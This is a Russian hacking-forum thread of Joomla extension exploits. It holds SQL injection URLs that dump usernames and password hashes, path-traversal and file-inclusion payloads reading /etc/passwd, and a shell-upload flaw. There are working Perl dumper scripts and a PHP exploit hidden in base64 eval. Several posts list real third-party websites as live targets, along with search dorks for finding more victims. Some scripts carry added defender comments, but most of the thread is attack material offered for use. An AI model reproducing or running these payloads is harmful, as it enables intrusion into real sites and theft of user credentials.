
Уязвимости Joomla && Mambo

Тема в разделе "Уязвимости популярных CMS", создана пользователем NetSky, 3 ноя 2008.

  1. Хулиган
    Joomla Discussions Component (com_discussions) SQL Injection


    Код:
    # 
    # Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
    # Author : Red Security TEAM
    # Date : 17/01/2012
    # Risk : High
    # Software : http://extensions.joomla.org/extensions/communication/forum/13560
    # Tested On : CentOS
    # Contact : Info [ 4t ] RedSecurity [ d0t ] COM
    # Home : http://RedSecurity.COM
    #

    Exploit:
    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=[SQLi]
    Example:

    1. [Get Database Name]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
    2. [Get Tables Name]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
    3. [Get Username]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
    4. [Get Password]

    Код:
    http://localhost/index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
    (с) bugsearch
     
    19 янв 2012
  2. Хулиган
    [ Joomla Component com_br LFI Vulnerability ]


    [x] Author : the_cyber_nuxbie
    [x] Home : www.thecybernuxbie.com
    [x] E-mail : staff@thecybernuxbie.com
    [x] Found : 23 January 2012.
    [x] Tested : Windows 7 Ultimate.
    [x] Dork : inurl:"/index.php?option=com_br"


    [x] Vuln Exploit Report:
    Код:
    http://localhost/index.php?option=com_br&controller=[LFI]
    - Example Website Vuln:
    Код:
    http://beginrecovery.nmy2.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00
    Joomla XBall SQL Injection


    • Exploit Title : Joomla Component (com_xball) SQL Injection Vulnerability
    • Author : CoBRa_21
    • E-Mail : uyku_cu [at] windowslive.com
    • My Team : Lojistik ALLSTAR (cyber-warrior.org)
    • Google Dork : inurl:index.php?option=com_xball
    • Status : High-Risk

    SQL Vulnerability

    Код:
    http://127.0.0.1/[PATH]/index.php?option=com_xball&controller=teams&task=show&team_id=-98 (SQL)
    SQL EXPLOIT

    Код:
    +union+select+0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users
    (c) securityhome
     
    23 янв 2012
  3. Хулиган
    Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit


    Код:
    #!/usr/bin/perl
    # Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
    # www.securitybydefault.com
    # Joomla <2.5.1 time based sql injection - vuln by Colin Wong
    #
    # using sleep() and not benchmark(), change for < mysql 5.0.12
    #
    # 1.- Database name: database()
    # 2.- Users data table name: (change 'joomla' for database() result)
    # 	select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
    # 3.- Admin password: (change zzz_users from previous sql query result)
    # 	select password from zzzz_users limit 1
    use strict;
    use LWP::UserAgent;
    # Unbuffered STDOUT: data() below prints one recovered character per eight
    # probes, so output must appear as it is produced rather than at exit.
    $| = 1;
    # Positional arguments: base URL of the Joomla install, the number of seconds
    # the server is asked to sleep() on a "true" probe, and the SQL expression
    # whose result is read back. Only the third is checked for presence; none is
    # validated, and $url is concatenated into request paths exactly as given.
    my $url = $ARGV[0];
    my $wtime = $ARGV[1];
    my $sql = $ARGV[2];
    unless ($ARGV[2]) {
     print "$0 <url> <wait time> <sql>\n";
     print "\texamples:\n";
     print "\t get admin password:\n";
     print "\t\t$0 http://host/joomla/ 3 'database()'\n";
     print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
     print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
     print "\t get file /etc/passwd\n";
     print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
     exit 1;
    }
    # $len is appended to by len() below; $sqldata is declared here but never
    # assigned or read anywhere in the script.
    my ($len,$sqldata);
    my $ua = LWP::UserAgent->new;
    $ua->timeout(60);
    $ua->env_proxy;
    # One-shot baseline round trip. Every later verdict is the comparison
    # "elapsed >= $regrtt + $wtime", with time() at whole-second resolution, so
    # the whole run is only as reliable as this single sample.
    my $stime = time();
    my $res = $ua->get($url);
    my $etime = time();
    my $regrtt = $etime - $stime;
    print "rtt: $regrtt secs\n";
    print "vuln?: ";
    # Vulnerability check: one request whose path carries a sleep() payload; a
    # response delayed by at least $wtime is taken as confirmation, anything else
    # exits. Defender note: every request this script sends, here and in
    # len()/data(), carries the same literal "/index.php/404' union select"
    # fragment in the request path, which is a direct access-log / WAF
    # signature. The post title names Joomla 2.5.0-2.5.1 as the affected range
    # (the script header says <2.5.1); installs in that range should be updated.
    my $sleep = $regrtt + $wtime;
    $stime = time();
    $res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
    $etime = time();
    my $rtt = $etime - $stime;
    if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
    # Number of decimal digits in the result length (1..5). Set by len(), which
    # closes over this file-level variable.
    my $lenoflen;
    # len($sql): recover the decimal length of the result of $sql one digit at a
    # time, purely from response timing. Side effects: sets the file-level
    # $lenoflen and appends digits to the file-level $len, which is also the
    # return value. $_[0] is re-read inside each loop as a lexical $sql that
    # shadows the file-level $sql of the same name.
    sub len {
     # length of length
     # Pass 1: how many digits does the length have? Probes 1..5 in order and
     # stops at the first delayed response. If none is delayed, $lenoflen stays
     # undef, pass 2 iterates zero times and the sub returns undef.
     for (1..5) {
    	my $sql=$_[0];
    	$stime = time();
    	$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
    	$etime = time();
    	my $rtt = $etime - $stime;
    	if ($rtt >= $regrtt + $wtime) {
    		$lenoflen = $_;
    		last;
    	}
     }
     # Pass 2: for each digit position $ll, try 0..9 and append every digit whose
     # probe is delayed. Nothing enforces exactly one hit per position, so a
     # timing glitch either drops a position or appends two digits for it.
     for (1..$lenoflen) {
      my $ll;
      $ll=$_;
      for (0..9) {
    	my $sql=$_[0];
    	$stime = time();
    	$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
    	$etime = time();
    	my $rtt = $etime - $stime;
    	if ($rtt >= $regrtt + $wtime) {
    		$len .= $_;
    	}
      }
     }
    	return $len;
    }
    # data($sql, $len): print the result of $sql to STDOUT one character at a
    # time. Each character costs eight timing probes, one per bit mask 1..128;
    # a delayed response means "(ord & mask) = 0", i.e. the bit is 0. Nothing is
    # returned; output happens as a side effect. Defender note: this is the
    # noisy part of the script, eight slow requests per recovered character,
    # all to the same path, which is an easy rate/latency anomaly to alert on.
    sub data {
     my $sql = $_[0];
     my $len = $_[1];
     my ($bit, $str, @byte);
     my $high = 128;
     for (1..$len) {
     	my $c=8;
     	# Index 0 holds "" and indices 8..1 receive the bits, LSB at 8, so the
     	# join below yields exactly eight bits in MSB-first order for pack("B*").
     	@byte="";
    	my $a=$_;
    	for ($bit=1;$bit<=$high;$bit*=2) {
    		$stime = time();
    		# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
    		$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
    		$etime = time();
    		my $rtt = $etime - $stime;
    		if ($rtt >= $regrtt + $wtime) {
    			$byte[$c]="0";
    		} else { $byte[$c]="1"; }
    	$c--;
    	}
       	$str = join("",@byte);
    	print pack("B*","$str");
      }
    }
    # Driver: recover the result length first, then read the bytes. If len()
    # returned undef (no digit probe was ever delayed) the "length:" line prints
    # an empty value and data() loops zero times.
    $len = len($sql);
    print "$sql length: $len\n";
    print "$sql data:\n\n";
    data($sql,$len);
    источник: exploit-db.com
     
    20 мар 2012
  4. Хулиган
    Joomla 2.5 Modules Simple Spotlight Upload Shell


    Код:
    # Author: BL4ckc0d1n6
    # Exploit Title: Simple Upload Modules Simple Spotlight 
    # Date: 3-22-2012
    # Vendor or Software Link:www.pixelpointcreative.com
    # Category: WebApp / Joomla Modules
    # inurl:/modules/mod_ppc_simple_spotlight/elements/upload_file.php
    # Demo Link:
    # http://axiom.pixelpointcreative.com/features/simple-spotlight.html
    # http://lofty.pixelpointcreative.com/features/modules/simple-spotlight.html
    # Version: 2.1.0
    # Price: Non-Commercial
    # Contact: BL4ckc0d1n6@anonymousteam.com / BL4ckc0d1n6@ymail.com
    # Website: anonymousteam.com
    # Greetings to: Flazer | Hmei7 | BaghazzNewbie23 | SutuL | raptorc0der| Doza |
    # 		admin07 | Rose | zamie1st | Sheep139 | K4C3Undetected | All KCH Crew | 
    # 		Indonesian Cyber Army | Indonesian Cyber Center | All Group and Forum Hacker Indonesia
    # 		~ special thanks to : jos_ali_joe (exploit-id.com)  and You

    [Exploit]

    Код:
    http://127.0.0.1/modules/mod_ppc_simple_spotlight/elements/upload_file.php
    Код:
    http://127.0.0.1/modules/mod_ppc_simple_spotlight/img/[shell.php.jpg]

    [Sample]
    -
    Код:
    http://www.kennedyhschicago.org/modules/mod_ppc_simple_spotlight/img/index.html
    -
    Код:
    http://www.itcwp.com/joomla/modules/mod_ppc_simple_spotlight/img/index.html
     
    22 мар 2012
  5. Хулиган
    joomla component (com_ponygallery) SQL injection


    Код:
    ##################################################
    # Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability
    # Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2
    # Date: 11/04/2012
    # Author: xDarkSton3x
    # E-mail : xdarkston3x@msn.com
    # Category: webapps
    # Google dork: inurl:"com_ponygallery"
     
     
    ##################################################
     
    [~]Exploit/p0c :
    http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]
     
    Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team  -  DiosdelaRed -  RemoteExecution ] [ Dedalo - Maztor ]
     
    16 апр 2012
  6. Хулиган
    Joomla template JA T3-Framework Directory Traversal Vulnerability 0-Day


    Код:
    # Vendor:
    http://extensions.joomla.fr/extensions/index-des-extensions-fr/1788-Templates/4151-ja-t3-framework-joomla-15
    
    # Author : indoushka
    
    # Tested on : Ubuntu Linux 9.10



    # Dork : inurl:/index.php?jat3action=

    # Demo :
    Код:
    http://www.maxim-tours.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=
    gzip&type=css&v=1
    Код:
    http://www.taqadoumy.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://iraneconomist.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://yxact.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&t
    ype=css&v=1
    Код:
    http://www.rtmcsumut.com/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://news.lk/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&typ
    e=css&v=1
    Код:
    http://www.guiaenarm.net/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gz
    ip&type=css&v=1
    Код:
    http://britanskie-kotiki.ru/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action
    =gzip&type=css&v=1
    Код:
    http://profidom.com.ua/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip
    &type=css&v=1
    -------------

    Код:
    http://localhost/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&
    amp;type=css&v=1
    (c) 1337day.com
     
    23 апр 2012
  7. Хулиган
    Joomla com_eslamiat Sql Injection Vulnerability


    Код:
    # Exploit Title: Joomla com_eslamiat Sql Injection Vulnerability
    # Exploit Author: Siamak.Black
    # Tested on: BackTrack , 7 , Redhat
    # Version : 1.5
    # Script Site : http://www.joomla.org
    # MAil : siam4k.black@yahoo.com
    # Home : IRaNHACK.ORG
    # Team : IRANHACK SECURITY TEAM
    Dork:
    Код:
    inurl:index.php?option=com_eslamiat&Itemid=
    Код:
    inurl:com_eslamiat&Itemid=
    Exploit:
    Код:
    http://Site.CoM/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=[Sqli]
    Код:
    http://Site.CoM/index.php?option=com_eslamiat&Itemid=[Sqli]
    Example:

    Код:
    http://arabic.irib.ir/index.php?option=com_eslamiat&Itemid=24&task=Maraghed&mode=-912+/*!union*/+/*!select*/+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
    information:

    Код:
    Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/
    
    Admin Page ~~~~~~~~~> Administrator
    (c) iranhack.org
     
    6 июн 2012
  8. Хулиган
    Joomla Component com_hello Local File Include

    Код:
    Author : Ajax Security Team
    
    Discovered By : devilzc0der & Dominator
    
    Dork : inurl:"com_hello"
    
    h0m3 : www.ajaxtm.com
    
    Software Link : www.joomla.com
    p0c:
    Код:
    com_hello&controller=../../../../../../../../etc/passwd%00

    Example:
    Код:
    http://site.ru/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
    source: securityfocus.com
     
    23 июл 2012
  9. nem1s
    Joomla Spider Calendar Lite Remote Exploit

    Information:

    Код:
     Exploit Title: Joomla spider calendar lite Remote Exploit
     dork: inurl:com_spidercalendar
     Date: [29-08-2012]
     Author: Daniel Barragan "D4NB4R"
     Twitter: @D4NB4R
     site: http://poisonsecurity.wordpress.com/ 
     Vendor: http://web-dorado.com/products/spider-calendar-lite.html 
     Version: Last  
     License: Non-Commercial
     Demo: http://web-dorado.com/products/spider-calendar-lite.html
     Download: http://web-dorado.com/products/spider-calendar-lite.html  
     Tested on: [Linux(bt5)-Windows(7ultimate)]
     Especial greetz:  _84kur10_, dedalo, nav
    

    Descripcion


    Код:
    
    Spider Calendar Lite is a highly configurable Joomla extension which allows you to have multiple organized events in a calendar. You can create as many events as you need for a day. With a simple click on the date you will see the events and their descriptions recorded for that day. 
    
    Usage:  http:// 127.0.0.1/exploit.php
    
    note: Copy the following code completely and paste it in your file exploit.php 

    Exploit:

    Код:
    <script><!--
    // NOTE(review): the escaped HTML written here is only a form with a "url"
    // text field posting to "?action=exploit"; all server-side logic is in the
    // PHP block that follows.
    document.write(unescape("%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3ESpider%20Calendar%20Joomla%20Exploit%3C/title%3E%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Diso-8859-1%22%3E%3Cstyle%20type%3D%22text/css%22%3E%0A%3C%21--%0Abody%2Ctd%2Cth%20%7B%0A%09color%3A%20%23FF0000%3B%0A%7D%0Abody%20%7B%0A%09background-color%3A%20%23000000%3B%0A%7D%0A--%3E%0A%3C/style%3E%3C/head%3E%0A%0A%3Cbody%3E%3Cbr%3E%0A%3Cbr%3E%3Ccenter%3E%0A%3Cimg%20src%3D%22http%3A//a4.sphotos.ak.fbcdn.net/hphotos-ak-ash3/553280_444893268875730_721348140_n.jpg%22%20width%3D%22125%22%20height%3D%22109%22%20align%3D%22middle%22%20longdesc%3D%22Posion%20Security%20%22%3E%3Cbr%3E%3C/center%3E%0A%3Cdiv%20align%3D%22center%22%3E%3Cbr%3E%0A%20%20%3Ca%20href%3D%22https%3A//poisonsecurity.wordpress.com%22%3EPoison%20Securtity%3C/a%3E%20%3Cbr%3E%0A%20%20Joomla%20Spider%20Calendar%20Remote%20Sql%20Exploit%0A%20%3Cbr%3E%0A%20%20%3Cbr%3E%0A%20%20%0A%3C/div%3E%0A%3Cform%20action%3D%22%3Faction%3Dexploit%22%20METHOD%3D%22post%22%3E%0A%3Ctable%20border%3D0%3E%0A%3Ctr%3E%0A%3Ctd%3EIngrese%20La%20url%20del%20Sitio%20%3C/td%3E%0A%3Ctd%3E%3Cinput%20type%3D%22text%22%20name%3D%22url%22/%3E%3C/td%3E%3Ctd%3E%3Cinput%20type%3D%22submit%22%20name%3D%22launch%22/%3E%3C/td%3E%0A%3C/tr%3E%0A%3C/table%3E%0AUso%20%20http%3A//127.0.0.1/path/%3Cbr%3E%0APosible%20dork%3A%20inurl%3Acom_spidercalendar%3Cbr%3E%0A%3Cbr%3E%20%0A%3C/form%3E%0A%3C/body%3E%0A%0A%3C/html%3E"));
    //--></script><?php
    // NOTE(review): the PHP logic is shipped as eval(base64_decode(...)) and is
    // not readable on this page, so what it actually does when executed cannot
    // be audited from here. Decode it and read it before running anything from
    // this post. eval(base64_decode()) is the same construct most PHP
    // webshell/backdoor scanners key on, and "paste this blob into exploit.php
    // on your own server" is a common way trojanized tooling is distributed.
    eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWYoJF9HRVRbJ2FjdGlvbiddPT0nZXhwbG9pdCcpDQp7DQokcmVzdWx0YWRvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfUE9TVFsndXJsJ10uIi9pbmRleC5waHA/b3B0aW9uPWNvbV9zcGlkZXJjYWxlbmRhciZkYXRlPTk5OTk5OS45JTI3JTIwdW5pb24lMjBhbGwlMjBzZWxlY3QlMjBudWxsJTJDbnVsbCUyQ2NvbmNhdCUyODB4M0QzRDNEM0QzRCx1c2VybmFtZSwweDNELHBhc3N3b3JkLDB4M0QzRDNEM0QzRCUyOSUyQ251bGwlMkNudWxsJTJDbnVsbCUyMGZyb20lMjBqb3NfdXNlcnMrLS0rJTIwRDROQjRSIik7DQokcGFydGVzPWV4cGxvZGUoIj09PT09IiwkcmVzdWx0YWRvKTsNCmVjaG8gJHBhcnRlc1sxXTsNCn1lbHNlew0KZWNobyAiSW5ncmVzZSBVcmwiOw0KfQ0KLy9ENE5CNFIgMjAxMg0KLypTaSB1c3RlZCBlc3RhIGxleWVuZG8gZXN0ZSBtZW5zYWplIGxvIGZlbGljaXRvIHBvciBxdWUgc2lnbmlmaWNhIHF1ZSBubyBsZSBiYXN0YSBzb2xvIGNvbiBxdWUgbGUgZGUgbGEgY2xhdmUsIHNpIG5vIHF1ZSB1c3RlZCBxdWllcmUgc2FiZXIgZWwgcG9ycXVlIGRhIGxhIGNsYXZlLCBhdW5xdWUgZXMgYWxnbyB0YW4gc2ltcGxlIGVzbyBsbyBoYWNlIGRpZmVyZW50ZSBkZSBtdWNob3MsIG1pIGFtaWdvIF84NGt1cjEwXyB5IHlvIEQ0TkI0UiBsZSBzYWx1ZGFtb3MqLw=="));
    ?>
     
    30 авг 2012
  10. nem1s
    Joomla Component (com_icagenda) Blind SQLi/Path Disclosure

    Information:

    Код:
    Exploit Title: Joomla Component (com_icagenda) Blind SQLi/Path Disclosure . 
    Date: 31 August 2012
    Author: Dark-Puzzle (Souhail Hammou)
    Risk : Critical
    Version: All Versions
    Google Dork : N/A
    Category: Webapps/0day
    Tested on: Windows Xp Sp2 Fr .
    
    Blind SQL Injection Vulnerability:

    Код:
    	Vulnerability :
    
    	The "id" parameter in com_icagenda is prone to a blind SQL injection vulnerability. An attacker can retrieve and steal data by sending a series of true/false queries through SQL statements.
    	Here the invisible content shows us that the target suffers from BSQLi .
    
    	Example : 
    
    	www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True)
    	www.hackme.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
    
    	Live Example :
    
    	http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 (True) Content is displayed
    	http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 (False)
    
    	Other Live Examples :
    
    	http://www.brie-danse.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=133&id=3 and 1=2 (False) --> Blind Injection .
    	http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid=107&id=1 and 1=2 (False) --> Blind Injection
    
    	ADMIN PANEL : http://target/administrator
    	Then you can upload your shell & enjoy the rest .
    Full Path Disclosure Vulnerability

    Код:
    The full path can be retrieved by passing the Itemid and id parameters as arrays ([]).
    	
    	Live Examples :
    		http://www.cocdklive.com/index.php?option=com_icagenda&view=list&layout=event&Itemid[]=107&id=1
    		http://www.leadinspiretransform.org/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
     
    31 авг 2012
  11. Хулиган
    Joomla Component RokModule Blind SQLi [module] Vulnerability

    Код:
    Nombre del Componente: Com_rokmodule
    
    Empresa: http://www.rockettheme.com/
    
    Testeado: Linux Backtrack
    
    Autor: Yarolinux Para WebSecurityDev
    Twitter: @Yarolinux
    
    Fecha: 09/09/2012
    Код:
    http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]
    Код:
    http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]
     
    11 сен 2012
  12. Хулиган
    Joomla tag Remote Sql Exploit


    dork: inurl:index.php?option=com_tag

    Date: [18-10-2012]

    Author: Daniel Barragan "D4NB4R"

    Twitter: @D4NB4R

    Vendor: http://www.joomlatags.org

    Version: all

    License: Non-Commercial

    Download: http://www.joomlatags.org/joomla-tag/joomla-tag-download.html

    Tested on: [Linux(bt5)-Windows(7ultimate)]

    Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


    Descripcion: N/A

    Exploit:

    Код:
     
     
        #!/usr/bin/perl -w
        # Joomla Component (tag) Remote SQL Exploit
        #----------------------------------------------------------------------------#
        # Script runs with -w only; there is no "use strict", so every variable
        # below is an undeclared package global.
     
        ########################################
        print "\t\t\n\n";
    print "\t\n";
    print "\t            Daniel Barragan  D4NB4R                \n";
    print "\t                                                   \n";
    print "\t      Joomla com_tag Remote Sql Exploit \n";
    print "\t\n\n";
     
    use LWP::UserAgent;
    # The site is read from STDIN and used verbatim; the prompt expects a
    # trailing slash because "index.php?..." is appended without one.
    print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
     
    chomp(my $target=<STDIN>);
     
        # Column name to read from the users table (an SQL identifier, not a credential).
        $user="username";
        # Column name holding the stored password hash (again an SQL identifier).
        $pass="password";
        # Users table as configured here; "jos_" is the table prefix assumed by the author.
        $table="jos_users";
        # Query-string fragments: "option=com_tag&task=tag&lang=es" once joined below.
        $d4n="com_tag&task";
        $component="tag&lang=es";
         
        # NOTE: $b is Perl's sort() comparator variable; reusing it as the
        # user-agent object only works because this script never sorts and has no
        # "use strict".
        $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
        $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
         
        # Single GET whose "tag" parameter carries a UNION SELECT. The hex literals
        # are the marker strings <user>, <user><pass> and <pass> (0x3c757365723e,
        # 0x3c757365723e3c706173733e, 0x3c706173733e); the two regexes below look
        # for exactly those delimiters in the response body. Defender note: the
        # literal "tag=999999.9' union all select" in the query string is the
        # access-log signature of this request.
        $host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
        $res = $b->request(HTTP::Request->new(GET=>$host));
        $answer = $res->content;
         
        # Report whatever sits between the two <user> markers. No check is made
        # that the HTTP request itself succeeded.
        if ($answer =~ /<user>(.*?)<user>/){
                print "\nLos Datos Extraidos son:\n";
          print "\n
          
    * Admin User : $1";
          
        }
         
        # Same for the <pass> markers; the "failed" branch is only reached when
        # this second regex does not match.
        if ($answer =~/<pass>(.*?)<pass>/){print "\n
          
    * Admin Hash : $1\n\n";
          
        print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
        else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
    
     
    Последнее редактирование: 22 окт 2012
    22 окт 2012
  13. CryNEt
    Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
    3xpl01t c0d3 :

    Код:
    Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
    author : *devil-zone.net
    greet is to : devil-zone.net *all members 
    vel = sqlI 
    S1mPl3 P3rL 3xpl01t3r

    Код:
    #!/usr/bin/perl
    #greet is to Evil-Dz
    # No "use strict"/"use warnings": every variable below is a package global.
    # system("clear") shells out just to clear the terminal.
    system("clear");
    print "***************************************\n";
    print " * * * * Good Luck & Hafe Fun * * * * *\n";
    print " * * * Coded by devil-zone forum * * **\n"; 
    print "***************************************\n\n";
    use LWP::UserAgent;
    # Host is read from STDIN and used verbatim; "/index.php?..." is appended
    # with a leading slash, so the prompt expects no trailing slash.
    print "Target page [ex: HosT] --> ";
    chomp(my $target=<STDIN> );
    # Columns selected into one field, colon-separated: username:password:mail.
    $column_name="concat(username,0x3a,password,0x3a,mail)";
    # Assigned but never used: the query string below hard-codes "jos_users".
    $table_name="jos_users";
    # Injection prefix; the /**/ inline-comment spacing stands in for whitespace
    # and is itself a well-known access-log / WAF signature.
    $prm="-1/**/union/**/select/**/";
    $start= LWP::UserAgent->new() or die "[!] Error while processing";
    $start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
    # Single GET against com_huruhelpdesk with the payload in cid[0].
    $website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
    $ok= $start->request(HTTP::Request->new(GET=>$website));
    # Any run of 32 hex digits anywhere in the response body is reported as the
    # "password", whether or not it came from the injected query; the HTTP
    # status is never checked.
    $ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
    print "[+] Password found --> $1\n\n";
    sleep 1;
    }
    else
    {
    print "No password found :(\n";
    } 
     
    22 янв 2013
